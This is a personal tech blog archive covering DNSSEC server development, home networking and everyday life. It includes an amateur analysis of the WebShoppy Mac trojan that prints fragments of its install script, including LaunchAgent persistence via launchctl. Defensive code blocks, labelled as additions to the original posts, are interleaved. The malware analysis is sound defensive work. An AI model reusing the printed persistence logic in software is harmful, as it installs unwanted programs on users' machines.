July 23, 2015		Macbook Pro and things
July 17, 2015		My CryptoBook
July 15, 2015		Donated $15 to FreeBSD Foundation
July 13, 2015		Purchased Netbook
July 10, 2015		Status update of Delphinusdnsd and DNSSEC
July 10, 2015		Hand-Down and a Story
July 9, 2015		Signatures of Time - Double Play
July 7, 2015		Freifunk was affected by an MTU issue
July 6, 2015		It definatly was hotter than 2003
July 4, 2015		Power outtage this morning
July 3, 2015		I have donated 20 euros to the Greece bailout fund
June 28, 2015		AKW Grafenrheinfeld has shut down over night
June 28, 2015		Status update on Delphinusdnsd and DNSSEC
June 25, 2015		RFC 4034 compliant AFAIK
June 25, 2015		Donated 50 euros to OpenBSD
June 24, 2015		Vacation cut short
June 23, 2015		Art display of my parents creations
June 22, 2015		Delphinusdns Project sponsors Luke Antins
June 22, 2015		Donated 150 euros to the Red Cross
June 21, 2015		Happy Solstice
June 20, 2015		The First Ever DNSSEC answer from Delphinusdnsd
June 18, 2015		Delphinusdnsd Hack days, entering production..
June 13, 2015		I'm on Vacation
June 6, 2015		Purchased two Books
June 5, 2015		Vacation in a week
May 22, 2015		Computers are better Rappers?  Perhaps...
May 21, 2015		Advocacy for OpenBSD
May 21, 2015		My udptunnel program is open source now
May 19, 2015		Holidays less than a month away
May 15, 2015		OpenBSD 5.7 arrived
May 15, 2015		Freifunk Tunnel Masters
May 13, 2015		Anexit
May 12, 2015		Donated 25 euros toward Nepal
May 12, 2015		Purchased DJ mixer
May 9, 2015		Where do you get your clothes?
May 8, 2015		Pension, TV and Books
May 2, 2015		OpenBSD CD's delayed, upgraded anyways
April 30, 2015		Httpd died overnight
April 29, 2015		Goodbye Avon!
April 28, 2015		OpenBSD getting hammerfs through GSOC?
April 24, 2015		Happy 25th anniversary Hubble!
April 24, 2015		And the Park seemed inviting
April 22, 2015		Donated 50 euros to OpenBSD
April 22, 2015		Bought two singles
April 22, 2015		Vernal Equinox and Jesus
April 21, 2015		Exploring Xephem
April 20, 2015		Backport of patch for OpenSMTPD 5.4.2p1
April 15, 2015		The contraction of my VPS network
April 15, 2015		Blog Outtage this Morning
April 13, 2015		One year of mercury (computer)
April 11, 2015		Sorry no Linkedin, yet
April 11, 2015		Mac OS X 10.10.3 killed my screensaver!
April 9, 2015		Wildcarddnsd 0.9.1
April 7, 2015		Greece's war reparation demand
April 4, 2015		Happy Easter
April 1, 2015		Astronomers detect a giant star in Constellation Pisces
March 31, 2015		ESA what are your plans?
March 30, 2015		R.I.P. Paul Schenkeveld
March 29, 2015		Please, not another LEO ISS!
March 28, 2015		The catch-22 of mental illness
March 21, 2015		My Eclipse photos were a FAIL
March 14, 2015		Happy Pi day
March 13, 2015		Pre-Ordered OpenBSD 5.7
March 12, 2015		Wrote two members of parliament
March 12, 2015		Equinox in 8 days
March 7, 2015		Crackers are getting more careful
March 5, 2015		Oldlaptop's github repo
March 5, 2015		OpenBSD's httpd with webalizer
March 5, 2015		Softraid Crypto seems secure
February 27, 2015	God Speed Spock!
February 26, 2015	OpenBSD donations reached 397,000 dollars in 2014
February 25, 2015	Got a washing machine
February 24, 2015	Nearing 20 years UNIX experience
February 23, 2015	Ordered three books
February 21, 2015	Scarcity vs. Abundance
February 16, 2015	Moved the blog
February 14, 2015	Upper Lower Class
February 13, 2015	I'm sick
February 6, 2015	Next Week marks Two Years in My Apartment
February 5, 2015	Thinking of voting Die Linke in 2017
February 5, 2015	The last frontier, under the ice
February 3, 2015	Why I think "The Time Machine" doesn't work in reality
February 2, 2015	I want a Greek bailout
January 28, 2015	The rich can't buy smarts, can they?
January 27, 2015	Electricity (day) consumption up (unfortunately)
January 26, 2015	Cryptowars: Organised Crime and Terrorists
January 24, 2015	Administrivia
January 24, 2015	Is it more than Space Junk?
January 19, 2015	This is how fair the world is
January 13, 2015	And our rights diminish
January 11, 2015	I am not your subordinate
January 9, 2015		Ordered 3 books
January 5, 2015		My 150 Euro Calculator
January 5, 2015		Donation time again
December 31, 2014	Happy New Year!
December 29, 2014	Added supercluster to nameservers
December 28, 2014	Winter Flowers
December 24, 2014	Merry Christmas / Frohe Weihnachten!
December 17, 2014	NASA wants to go to Venus
December 16, 2014	My thought about Pegida
December 16, 2014	A domain expired, amdeutschhof.de
December 15, 2014	December solstice in less than a week!
December 12, 2014	Comparison between Mordor and the US
December 9, 2014	Farewell American Forces
December 8, 2014	Speak German at home...
December 6, 2014	When Fighters scramble



Our XMAS Dinner

December 29th, 2015



More power from Arabia and Sahara?

December 31st, 2015

A ghost haunts Europe. It's the power ghost. Once there is no more oil either available or sanctioned due to the environmental effects, where will we get our power from? One corporation in Germany has a plan. But do we really want to upkeep the power hegemony in Arabia and Sahara just to get our power? These are political factors which don't convince the technical ones.



Delphinusdnsd 1.0.0 Released

January 1st, 2016

I have released delphinusdnsd 1.0.0. You can download it here. The SHA256 code to the tarball looks like this: 8914aa55437081e44895a4cecdfff82b4a3be03fb38dd65d073c71e1be187e41.

I've worked on this release for over a year. Some parts are incomplete still but I feel I gotta get it out the door. When is a DNS server ever complete though one may ask? Anyhow, enjoy!



When a book loses significance

January 1st, 2016

It's 2016. The following book has lost its significance.

This is the third edition of DNS and BIND, and it doesn't cover bind9 and it doesn't cover DNSSEC. However this book guided me for a while when I was writing on delphinusdnsd prior to writing the DNSSEC code. I can only put this book back into my bookshelf because it looks good. But that's about it. I would recommend the authors' works to anyone, they are written in an easy to understand fashion. Just don't get an old book like this one :-).



How hard can changing a password be?

January 1st, 2016

In my network which consists of 1 access point and 2 repeaters to create a WLAN bridge between 3 routers, I tried to change the Wifi password. Simple, I thought. I'd start with the repeater furthest away from me and change its WLAN password, then do the same on the access point and the same for the repeater closest to me. Was I in for a mental boxing match where I did not win. The repeaters decided they did not want to accept the access point because somehow I had WPS set to active, or was that it? Or was it the "hidden" link to find which station to connect to which had a password of its own. I still don't know what I did exactly to make these repeaters finally connect to my AP. On top of that they changed their IP's and I had to reconfigure my router to even connect to them. Talk about making a function hard, when it should be as simple as changing a light bulb! No kudos go to AVM with their Fritz line of Access points and Repeaters. They still owe me one regardless, due to losing ARP packets on their AP. Why did I ever invest into crap?



The invisible man

January 3rd, 2016

Have you ever wanted to go offline for good? No Internet for the NSA to track you. No online marketing. No email, and in my case no job. Believe it or not I went offline for about a year in 2001. I was misinformed when 9/11 happened, having only an FM radio to get my information. But imagine if an offline life was manageable. Can we do this at all? Make my workstations PC's again. Meaning it really is a personal computer and not a cloud extension. I'm interested in organizations who facilitate an offline life. Would I take the leap?



Donation time

January 6th, 2016

I have donated 100 euros to Theo de Raadt and OpenBSD. He'll have to get me really angry for me to donate to the foundation and even more angry for me to not donate, lol.



Organized Crime is the Enemy

January 8th, 2016

When you think of safety, you are naive to think you'll get it anywhere after the sun goes down. Be smart, don't put yourself in situations where you're defenseless, avoid hotspots. In Cologne ruthless gangs of organized criminals roamed the train station on New Year's Eve. The police were helpless, due to being outnumbered. One may now think of how to bring the individuals to justice, and face recognition technology comes to mind. Where will it end us up though? In a totalitarian society where everyone's face is recognized in real time?

One thing to remember is that it was organized crime that terrorized the few women and men who were rather defenseless. But the herd of sheep now know the wolf is about, and we need to think of ways to protect ourselves. For one, strong cryptography in voice and data is needed, and should not be backdoored. When organized crime does things they do it big and they want to get at the next victim's online banking. Be smart, keep the crypto strong; it is a foundation, a pillar for fighting the evil in society who group up. We know the wolf exists now and isn't just a fable. We need the right tools to combat him while keeping our society with its laws and freedoms intact and sturdy.



Dissecting WebShoppy Mac OS X trojan

January 9th, 2016

My dad got a virus on his Mac (Snow Leopard OS X I think). Before we reinstalled it with El Capitan I saved the binary, the install script, and an lsof output of this trojan called WebShoppy.

First unpack my tarball I made, first impressions are that there is a ._3166.sh file that was copied along with the 3166.sh script when I made the tarball, possibly a trait of the virus.

alpha$ tar -xvzf ws.tgz
ws
ws/._3166.sh
ws/3166.sh
ws/list.open
ws/WebShoppy
Let's take a look at this ._3166.sh file. It seems to be binary code so I'm going to hexdump it.
alpha$ hexdump -C ._3166.sh
00000000  00 05 16 07 00 02 00 00  4d 61 63 20 4f 53 20 58  |........Mac OS X|
00000010  20 20 20 20 20 20 20 20  00 02 00 00 00 09 00 00  |        ........|
00000020  00 32 00 00 00 79 00 00  00 02 00 00 00 ab 00 00  |.2...y..........|
00000030  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000050  00 00 00 00 41 54 54 52  00 00 00 00 00 00 00 ab  |....ATTR........|
00000060  00 00 00 9c 00 00 00 0f  00 00 00 00 00 00 00 00  |................|
00000070  00 00 00 00 00 00 00 01  00 00 00 9c 00 00 00 0f  |................|
00000080  00 00 17 63 6f 6d 2e 61  70 70 6c 65 2e 54 65 78  |...com.apple.Tex|
00000090  74 45 6e 63 6f 64 69 6e  67 00 00 00 75 74 66 2d  |tEncoding...utf-|
000000a0  38 3b 31 33 34 32 31 37  39 38 34                 |8;134217984|
000000ab
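
The dump opens with 00 05 16 07, the magic number of the AppleDouble format that macOS uses for ._ sidecar files carrying a file's extended attributes and resource fork. The following is an added example, not part of the original post: it rebuilds the bytes from the hexdump above and parses them, assuming the AppleDouble and extended-attribute header layout from Apple's open-source xnu kernel; all function names are my own.

```python
import struct

# Output of `hexdump -C ._3166.sh`, copied verbatim from the post.
HEXDUMP = """\
00000000  00 05 16 07 00 02 00 00  4d 61 63 20 4f 53 20 58  |........Mac OS X|
00000010  20 20 20 20 20 20 20 20  00 02 00 00 00 09 00 00  |        ........|
00000020  00 32 00 00 00 79 00 00  00 02 00 00 00 ab 00 00  |.2...y..........|
00000030  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000050  00 00 00 00 41 54 54 52  00 00 00 00 00 00 00 ab  |....ATTR........|
00000060  00 00 00 9c 00 00 00 0f  00 00 00 00 00 00 00 00  |................|
00000070  00 00 00 00 00 00 00 01  00 00 00 9c 00 00 00 0f  |................|
00000080  00 00 17 63 6f 6d 2e 61  70 70 6c 65 2e 54 65 78  |...com.apple.Tex|
00000090  74 45 6e 63 6f 64 69 6e  67 00 00 00 75 74 66 2d  |tEncoding...utf-|
000000a0  38 3b 31 33 34 32 31 37  39 38 34                 |8;134217984|
000000ab
"""

APPLEDOUBLE_MAGIC = 0x00051607
FINDER_INFO_ID = 9
ENTRY_NAMES = {2: "resource fork", FINDER_INFO_ID: "Finder info"}


def bytes_from_hexdump(text):
    """Rebuild raw bytes from `hexdump -C` output, expanding '*' runs."""
    out, last_row, squeezed = bytearray(), b"", False
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line == "*":            # '*' = the previous 16-byte row repeats
            squeezed = True
            continue
        fields = line.split("|")[0].split()   # drop the ASCII column
        offset = int(fields[0], 16)
        if squeezed:
            if not last_row:
                raise ValueError("'*' with no preceding row")
            while len(out) < offset:
                out += last_row
            squeezed = False
        if len(out) != offset:
            raise ValueError("gap in dump at offset %#x" % offset)
        row = bytes(int(b, 16) for b in fields[1:])
        out += row
        last_row = row or last_row
    return bytes(out)


def _parse_attr_header(data, pos):
    """Parse the 'ATTR' extended-attribute header that starts at pos."""
    if data[pos:pos + 4] != b"ATTR":
        return {}
    # magic, debug_tag, total_size, data_start, data_length,
    # 12 reserved bytes, flags, num_attrs  (36 bytes, big-endian)
    _, _, total, _, _, _, count = struct.unpack_from(">IIIII12xHH", data, pos)
    if total > len(data):
        raise ValueError("attribute area runs past end of file")
    pos += 36
    attrs = {}
    for _ in range(count):
        off, length, _flags, namelen = struct.unpack_from(">IIHB", data, pos)
        name = data[pos + 11:pos + 11 + namelen].rstrip(b"\0").decode("utf-8")
        if off + length > total:
            raise ValueError("value of %s is out of bounds" % name)
        attrs[name] = data[off:off + length]
        pos = (pos + 11 + namelen + 3) & ~3    # entries are 4-byte aligned
    return attrs


def parse_appledouble(data):
    """Return the entry table and any extended attributes of a ._ file."""
    magic, version = struct.unpack_from(">II", data, 0)
    if magic != APPLEDOUBLE_MAGIC:
        raise ValueError("not an AppleDouble file")
    creator = data[8:24].decode("ascii", "replace").rstrip()
    (count,) = struct.unpack_from(">H", data, 24)
    entries, xattrs = [], {}
    for i in range(count):
        eid, off, length = struct.unpack_from(">III", data, 26 + 12 * i)
        if off + length > len(data):
            raise ValueError("entry %d runs past end of file" % eid)
        entries.append((ENTRY_NAMES.get(eid, "id %d" % eid), off, length))
        # xattrs live in the slack after the 32-byte Finder info + 2 pad bytes
        if eid == FINDER_INFO_ID and length > 34:
            xattrs = _parse_attr_header(data, off + 34)
    return {"version": version, "creator": creator,
            "entries": entries, "xattrs": xattrs}


if __name__ == "__main__":
    info = parse_appledouble(bytes_from_hexdump(HEXDUMP))
    for name, off, length in info["entries"]:
        print("%-14s offset=%d length=%d" % (name, off, length))
    for name, value in info["xattrs"].items():
        print("xattr %s = %r" % (name, value))
```

The only payload is one extended attribute, com.apple.TextEncoding, with the value utf-8;134217984; 134217984 is 0x08000100, the CFString constant for UTF-8. The resource fork entry is empty.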
Next I will show you parts of the 3166.sh script which was placed in the $HOME of my dad's user.
...
# existing check
brands=(flashmall webshoppers webshoppy smartshoppy)
brandExists=false
for currBrand in "${brands[@]}"; do
    if [ `pgrep -i $currBrand | wc -l` -gt 0 ]; then
        brandExists=$currBrand
    fi
done
...
Here it checks for the following programs already running on this computer. However it clobbers brandExists if multiple instances of these four programs exist.
...
    # user
  sudo -u $INSTALLER_USER launchctl unload $plist_user >> ${mmtmp}/${insname}.log 2>&1
  sudo -u $INSTALLER_USER /bin/rm -f $plist_user
  sudo -u $INSTALLER_USER cp $orig_plist_path $plist_user
  sudo -u $INSTALLER_USER launchctl load $plist_user  >> ${mmtmp}/${insname}.log 2>&1
...
It will then try to add what is a crontab-like entry (launchctl). So it registers itself into the system to always start up every boot. plist_user is $HOME/Library/LaunchAgents/com.WebShoppy.agent.plist in the script's case.

On to the binary. What I found interesting was that the content was encrypted, but strings on Mac OS X doesn't list all printable symbols, so on OpenBSD I was able to see who compiled this binary from environment variables packed into the binary. Chances are it's someone who had their computer hijacked.
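
One way to check a machine for this kind of LaunchAgent persistence, as an added example that is not part of the original post: it parses every plist in a LaunchAgents directory and reports jobs whose file name or contents mention one of the four brand names from the script. The sample plists built in demo(), including the label and the keys chosen, are constructed for illustration; only the file name, the brand list and the binary path come from the post.

```python
import plistlib
import tempfile
from pathlib import Path

# Brand names from the `brands=(...)` array in 3166.sh.
BRANDS = ("flashmall", "webshoppers", "webshoppy", "smartshoppy")


def _strings(value):
    """Yield every string (keys included) found inside a parsed plist."""
    if isinstance(value, str):
        yield value
    elif isinstance(value, dict):
        for key, item in value.items():
            yield str(key)
            yield from _strings(item)
    elif isinstance(value, (list, tuple)):
        for item in value:
            yield from _strings(item)


def scan_launch_agents(directory, brands=BRANDS):
    """Return one finding per launchd job that mentions a known brand."""
    findings = []
    for path in sorted(Path(directory).glob("*.plist")):
        try:
            with path.open("rb") as fh:
                job = plistlib.load(fh)      # handles XML and binary plists
        except Exception as exc:             # malformed plist: report, go on
            findings.append({"plist": path.name, "error": str(exc)})
            continue
        if not isinstance(job, dict):
            findings.append({"plist": path.name, "error": "root is not a dict"})
            continue
        haystack = [path.name, *_strings(job)]
        hits = sorted({b for b in brands
                       if any(b in s.lower() for s in haystack)})
        if hits:
            args = job.get("ProgramArguments") or [None]
            findings.append({
                "plist": path.name,
                "label": job.get("Label"),
                "program": job.get("Program") or args[0],
                "run_at_load": bool(job.get("RunAtLoad", False)),
                "brands": hits,
            })
    return findings


def demo():
    """Scan a temporary directory holding two constructed sample plists."""
    samples = {
        # Constructed: file name and binary path are from the post,
        # the Label and keys are assumptions.
        "com.WebShoppy.agent.plist": {
            "Label": "com.WebShoppy.agent",
            "ProgramArguments": ["/Applications/WebShoppy/WebShoppy"],
            "RunAtLoad": True,
        },
        # Constructed benign job that must not be flagged.
        "com.example.backup.plist": {
            "Label": "com.example.backup",
            "ProgramArguments": ["/usr/bin/true"],
            "RunAtLoad": False,
        },
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, job in samples.items():
            with (Path(tmp) / name).open("wb") as fh:
                plistlib.dump(job, fh)
        return scan_launch_agents(tmp)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

On a real Mac the same function can be pointed at `Path.home() / "Library/LaunchAgents"`, and at /Library/LaunchAgents and /Library/LaunchDaemons for system-wide jobs.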

...
03wnh{ul7yffwqtvs!vcd2gxr5vl{xjgisx5fvvrpriwyy2F|qvvgnB
pwe|hxlw}".i$0nl#hyrmmgjyoru)$Tejjwo%'ru!vywsoqn)viir0%3h'0npk$+Fiwp g#+$6j&%y~p
!wg{nvwc+vfpp)fvssrebxmxs&_ce$Tejjwo_ce$]r`wiu#QjxbWg{nvw'e^]&
...
/Users/janetlev/macwebtools/WebHelper/
...
So there is ciphertext in the binary as you can see. I did find the janetlev user string in there as well. She's likely innocent, I don't accuse her.

And finally I'd like to show an lsof output of the WebShoppy active in the System before we wiped it.

WebShoppy   491 mydadsuser  cwd      DIR              1,2      1224        2 /
WebShoppy   491 mydadsuser  txt      REG              1,2     56664 19581804 \
/Applications/WebShoppy/WebShoppy
WebShoppy   491 mydadsuser  txt      REG              1,2    600832 15963057 \
/usr/lib/dyld
WebShoppy   491 mydadsuser  txt      REG              1,2 344538318 19594212 \
/private/var/db/dyld/dyld_shared_cache_x86_64
WebShoppy   491 mydadsuser    0r     CHR              3,2       0t0      306 \
/dev/null
WebShoppy   491 mydadsuser    1w     CHR              3,2       0t0      306 \
/dev/null
WebShoppy   491 mydadsuser    2w     CHR              3,2       0t0      306 \
/dev/null
It doesn't seem to be doing too much. Perhaps it does things on a timer basis.

If anyone has hints on how I could have done the analysis or post-analysis any better let me know.



To Human Artificial Systems

January 19th, 2016

Money markets are mainly artificial. They exist only in our minds, with consequences on the body when there is a lack of resources. Let me say this. Would the stock market collapse when a star in the center of the galaxy collides with a black hole? No. Why not??? We have a brilliant way to look beyond the earth's (who we think we've conquered) hemisphere to the stars. Just because we are shielded does not exclude us from events happening in our cosmic neighbourhood. We need to include some reality with our artificial systems. Don't get me started on the price of oil either.



Preparing to sign my zones -> DNSSEC

January 20th, 2016

I still haven't signed the rest of my zones. I will do that in the next coming days and see if it works. I hope so. Delphinusdnsd is capable I think. No one is downloading it yet though, dunno why.



What's up or down with the Canadian Dollar?

January 21st, 2016

About three months ago I was exchanging my Canadian pay and I was getting what was reasonable money back. Today I'd be getting 144 Euros less. That doesn't seem reasonable. I am still patient but patience is running thin, I may have to re-negotiate my work contract to be paid in a more stable currency.



Delphinusdnsd - ironing out the DNSSEC bugs

January 22nd, 2016

I have started signing my personal zones. I'm the only one using them with my family so I can do this. I ran into some trouble yesterday and today with DNSSEC replies. Also reply_mx() in delphinusdnsd didn't like DNSSEC. I have stripped out the offending code but I'm gonna have to revisit it. For anyone who is trying to run this wait for the 1.0.1 release which will come out soon or use tonight's snapshot from -current (midnight CEST) to get the MX and NSEC3 fix. Sorry if anyone was bit by this, but I only had 1 DNSSEC test zone, and several zones are now unearthing bugs. I have my weekend planned for writing on this.



All Domain Names signed

January 23rd, 2016

This morning I did the last one of all my domains. Now I sit back and wait for problems to arise. I already did all the online validators and they are saying everything is correct. My email still works, which is the main thing.



Delphinusdnsd 1.0.1 released

January 29th, 2016

Bugfixes from the STABLE_1_0 branch have made the 1.0.1 release. I plan on doing up to 8 more (to 1.0.9) depending on need, otherwise new code will go into the -current branch and ultimately into the 1.1.0 release.



Electricity for 2015 way up

February 3rd, 2016

I guess I must have had too many days where I had it too warm in my apartment. So here is the table for comparison with the previous two years. It feels a bit fishy but I'll take their word for it.

Year	Night	Day	Total
2013	6941	1276	8217
2014	6906	1323	8229
2015	10151	1452	11603

This is in comparison with an earlier article from last year. I'm not gonna fight this outrageous bill but I'm gonna try to keep a cooler apartment for 2016 since it's mainly the heaters that made this jump.



Ten days from now is Year Three

February 3rd, 2016

It's been 3 years since I had this apartment. A look back. Unfortunately the electricity bill for 2015 was high, and I had to pay for a new Fridge. All in all these are 1000 euros of expenses that I didn't foreplan. But I have the best apartment I ever had and I still have the job I had when I moved here.



Delphinusdnsd what's next in development?

February 8th, 2016

I want to revisit the signing tool, and possibly do it in C. That or I'm thinking of incorporating DNSSEC signing right into the daemon. That would be a great feat, but hard to do I suspect. I'll have to carefully weigh my options.



DSL Link issues, Provider refuses to help me...

February 12th, 2016

I think it's time to switch providers. I have DSL link issues that started on Tuesday at 17:25 PM. The Link Control Protocol on my PPPoE router complains of lost keepalive frames and resets the connection.

Feb 12 10:29:34 gamma /bsd: pppoe0: LCP keepalive timeout
This is what my provider wrote to me (translated from German):
Thank you very much for your e-mail.

The CPE indicates a third-party device. If that is the case,
please connect the Fritz!Box 3270 provided by M-net
and test the connection with that device.

Unfortunately we cannot provide support for third-party devices.
I'm not going to plug in that insecure old router they request from me. Plus my internal network can't use it, it would take too much reconfiguring to put this router on. I've ordered a new VDSL modem though in case it's my (dumb) ADSL2 modem. This new modem allows me 100 Mbit/s which is tempting to be gotten. I think a switch will do me good as long as I can keep all equipment as is.



Apple is right (in this case)

February 18th, 2016

Apple has released a "letter to customer" outlining why they will fight the US government to put a back door into iOS products. In this case they (Apple) are right, and I'm proud to have an iOS device now. It takes a large corporation with good will to stand up to the strongest country in the world, and this time they are actually defending freedoms! My how upside-down that sounds, usually corporations take away freedoms and the government has to protect consumer rights. Just a sign though that there are people in government with great powers that want to take all of our privacy away, to know everything about us to hurt us in the end. We have a lack of good people in government it seems.



Getting a TV after 16 years having none

February 20th, 2016

I've decided to get a TV. I also decided to change my ISP that will give me triple play (Internet, VOIP Phone, TV over IP). All in all I'm going to turn this around in the next month or so. Stay tuned.



Registered domain zeropager.de

February 23rd, 2016

I have registered the domain zeropager.de. I did this because as a youth me and my buddies got pagers. Back then it was the in thing to do to have a pager as mobile phones were still too expensive to have. Public phone booths were aplenty back then and we used to make little 3 number codes to identify ourselves who we were, if the call was urgent or if we're inquiring where someone is. It was pretty fun. I had a dream about paging my old friend last night. It gave me a thought of perhaps making a SIP based paging business where people carry a raspberry pi zero around that writes on a LED display what people are paging them via SMS or email. Who knows perhaps it'll lead to something cool. I'm just riding my imagination right now.

And yes since I'm a kernel programmer newbie I'm sure to hit a zeropage somewhere if I was using it in hacker sense. I'm just buggy :P.



Venus broke

February 24th, 2016

My Soekris net6501 firewall broke. It's still on warranty but until then I'll be missing it from my network. I'm in contact with the reseller regarding RMA.



New Access Point in my apartment

February 24th, 2016

I have bought and installed an ASUS EA-AC87 Wireless AC1800 access point in place of my Fritzbox. It took some nerves to configure my repeaters to it but now everything is functioning. Just too bad the soekris died. I'm monitoring the health of this wireless access point but so far so good. I can't do test scp's to see how much faster everything is because I lost the soekris/venus and will have to wait until it's replaced.



19 days until March Equinox

March 1st, 2016

Happy March. We'll see the transition from winter to summer in this month at least officially as a number because the equinox is officially the demarcation point at which spring starts and winter ends. Can't wait!



New VDSL modem turned on

March 1st, 2016

I have turned on this new VDSL2 modem that I got the other day. Here are the link stats from my current ADSL.

I'm slowly getting ready to get a new provider (one that offers VDSL2 with vectoring) giving me 100 Mbit/40 Mbit. I'm just waiting for the venus soekris board to be returned to me with whatever fixes, and then I'm initiating a switch.



Ordered a backup Firewall

March 3rd, 2016

I have ordered a backup APU firewall. I'll keep this around in case the one I use now breaks. Having venus break was a wakeup call for me. Basically I can't afford to lose gamma my main firewall, or have a backup for it. I chose the latter. I wouldn't need this if I didn't work from home, btw. Looking in my chart logically this backup firewall will be called "delta".



After 16 years, I got a TV

March 6th, 2016

I finally got a TV after 16 years. It's a 48" Samsung and just blows my mind. I also bought a few other things with it. Now it's almost time to save up money again. I'm feeling really lucky though. It's great to be having money to spend and make use of these things. Thanks to a job!



30 Years of Personal Computing History

March 6th, 2016

I have updated my chart of all computers I have ever bought (except the RPI) that I last left in this article. Had I an accumulated computer of all clock cycles and RAM my computer today would be a single core 50 GHz computer with nearly 100 GB of RAM. Wow! However I don't have all the computers anymore so it's less than that in reality. Here is the updated chart...

year  , computer type       , Mhz     ,acc. Mhz , RAM        ,accumulated RAM
------------------------------------------------------------------------------
1986  , Sinclair ZX-81      , 1    Mhz, 1    Mhz, 4        KB,  4         KB
1988  , Commodore C-64      , 2    Mhz, 3    Mhz, 64       KB,  68        KB
1992  , IBM-PC 386-SX25     , 25   Mhz, 28   Mhz, 4096     KB,  4164      KB
1994  , IBM-PC 486-66DX2    , 66   Mhz, 94   Mhz, 8192     KB,  12356     KB
1996  , Intel Pentium 120   , 120  Mhz, 214  Mhz, 32767    KB,  45123     KB
1999  , Intel P-II-350      , 350  Mhz, 564  Mhz, 131072   KB,  176195    KB
1999  , Intel P-II-350      , 350  Mhz, 914  Mhz, 131072   KB,  307267    KB
2000  , AMD Athlon 1000     , 992  Mhz, 1906 Mhz, 262144   KB,  569411    KB
2001  , Apple G3 iBook      , 500  Mhz, 2406 Mhz, 131072   KB,  700483    KB
2001  , Apple G4 Cube       , 450  Mhz, 2856 Mhz, 131072   KB,  831555    KB
2003  , Intel Pentium 200   , 200  Mhz, 3056 Mhz, 65535    KB,  897090    KB
2005  , AMD Athlon64 3500+  , 2200 Mhz, 5256 Mhz, 4194304  KB,  5091394   KB
2010  , Intel Core i7 4core , 9600 Mhz,14000 Mhz, 8192000  KB, 13000000   KB
2011  , Intel Atom N270     , 1600 Mhz,15600 Mhz, 1024000  KB, 14000000   KB
2012  , AMD C-60 "Ontario"  , 1000 Mhz,16600 Mhz, 4096000  KB, 18000000   KB
2013  , Apple Mac mini      , 8400 Mhz,25000 Mhz,16000000  KB, 34000000   KB
2014  , Intel Xeon E3-      ,14000 Mhz,39000 Mhz,32000000  KB, 66000000   KB
2015  , Celeron CPU N2940   , 7200 Mhz,46000 Mhz, 4096000  KB, 70000000   KB
2015  , Apple MBP Core i5   , 5800 Mhz,52000 Mhz,16000000  KB, 86000000   KB
2015  , PC-Engines APU 2    , ?       , ?       , 2048000  KB, 88000000   KB
2016  , PC-Engines APU 4    , ?       , ?       , 4092000  KB, 92000000   KB
------------------------------------------------------------------------------

Let's see: a "computer generation" is 1.5 years and 4 years have passed. Did 3 generations of doubling each generation hold true for me?
generation 1 - 36
generation 2 - 72
generation 3 - 144

So judging by this I should be buying a 64 GB RAM machine at mid year in 2016. (In order to stay true to Moore's law...) Sorry that's not gonna happen, I plan on keeping at a bit of a standstill until 2020. But since this will be another generation past, I'll be expected to get a 256 GB RAM machine or so (by 2020). Wow! I do hope I find a use for it, but with Virtual Reality on the horizon I'm sure there will be.



Lordy Lordy look who is Forty

March 14th, 2016

In a few days I'm turning age forty. Time really went by fast. I'll be updating my private section of my webpage very soon to reflect this.



Making a turn-key dns server out of DelphinusDNSD

March 19th, 2016

Freifunk Franken needed a turn-key server to convert a MAC address to an AAAA RR via DNS, so I fleshed out (stripped out) a lot of parts from delphinusdnsd and made it available to them (FFFdnsd.tgz). The code to this is open source. Most of the functionality that I put together last night is in lookup_zone() which creates a struct domain on the fly. There are some inefficiencies in how the code is right now, but it works and that's the main point.

We discussed a little about buffer overflows, but I'm thinking if I introduced anything bad in lookup_zone() then that's where to find those. The rest of the code is identical to the delphinusdnsd code base (which also runs in production). I'm glad to be of use with my 10 year old daemon. It's not every day that I get a request such as this one.
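A bounds-checked version of the MAC-to-AAAA lookup described above, as an added example that is not code from FFFdnsd or delphinusdnsd. It assumes the first label of the query name is the MAC as 12 hex digits and that the answer is the modified EUI-64 address under a /64 prefix; the function names, the `node` zone label and the 2001:db8:: prefix are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_LABEL 63    /* RFC 1035: one label is at most 63 octets */
#define MAX_NAME  255   /* RFC 1035: a whole name is at most 255 octets */
#define MAC_HEX   12    /* assumption: MAC label is 12 hex digits, no separators */

/* Constructed sample query name in wire format: 0211223344ff.node. */
static const uint8_t sample_qname[] = {
    12, '0','2','1','1','2','2','3','3','4','4','f','f',
    4, 'n','o','d','e', 0
};
/* Placeholder /64 prefix (documentation range), not the project's real one. */
static const uint8_t sample_prefix[8] = { 0x20, 0x01, 0x0d, 0xb8, 0, 0, 0, 0 };

/* Value of one hex digit, or -1 if c is not a hex digit. */
static int hexval(uint8_t c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/*
 * Walk an uncompressed wire-format name in buf[0..len) and return its total
 * length including the root label. Returns -1 if a label would run past the
 * buffer, a length byte is a pointer or reserved type, the root label is
 * missing, or the name is longer than 255 octets.
 */
static int name_wire_len(const uint8_t *buf, size_t len)
{
    size_t off = 0;

    while (off < len) {
        uint8_t l = buf[off];

        if (l == 0)
            return (int)(off + 1);
        if (l > MAX_LABEL)
            return -1;
        if ((size_t)l + 1 > len - off)   /* label must fit in what is left */
            return -1;
        off += (size_t)l + 1;
        if (off >= MAX_NAME)             /* no room left for the root label */
            return -1;
    }
    return -1;                           /* ran out of bytes before the root */
}

/*
 * Build prefix + modified EUI-64 from the MAC in the first label of qname.
 * Returns 0 on success and -1 on malformed input; out is written only on
 * success, so a rejected query never leaves a half-filled answer behind.
 */
static int mac_qname_to_aaaa(const uint8_t *qname, size_t qlen,
    const uint8_t prefix[8], uint8_t out[16])
{
    uint8_t mac[6];
    int i;

    if (name_wire_len(qname, qlen) < 0)  /* validate before any indexing */
        return -1;
    if (qname[0] != MAC_HEX)
        return -1;
    for (i = 0; i < 6; i++) {
        int hi = hexval(qname[1 + 2 * i]);
        int lo = hexval(qname[2 + 2 * i]);

        if (hi < 0 || lo < 0)
            return -1;
        mac[i] = (uint8_t)((hi << 4) | lo);
    }
    memcpy(out, prefix, 8);
    out[8] = (uint8_t)(mac[0] ^ 0x02);   /* flip the universal/local bit */
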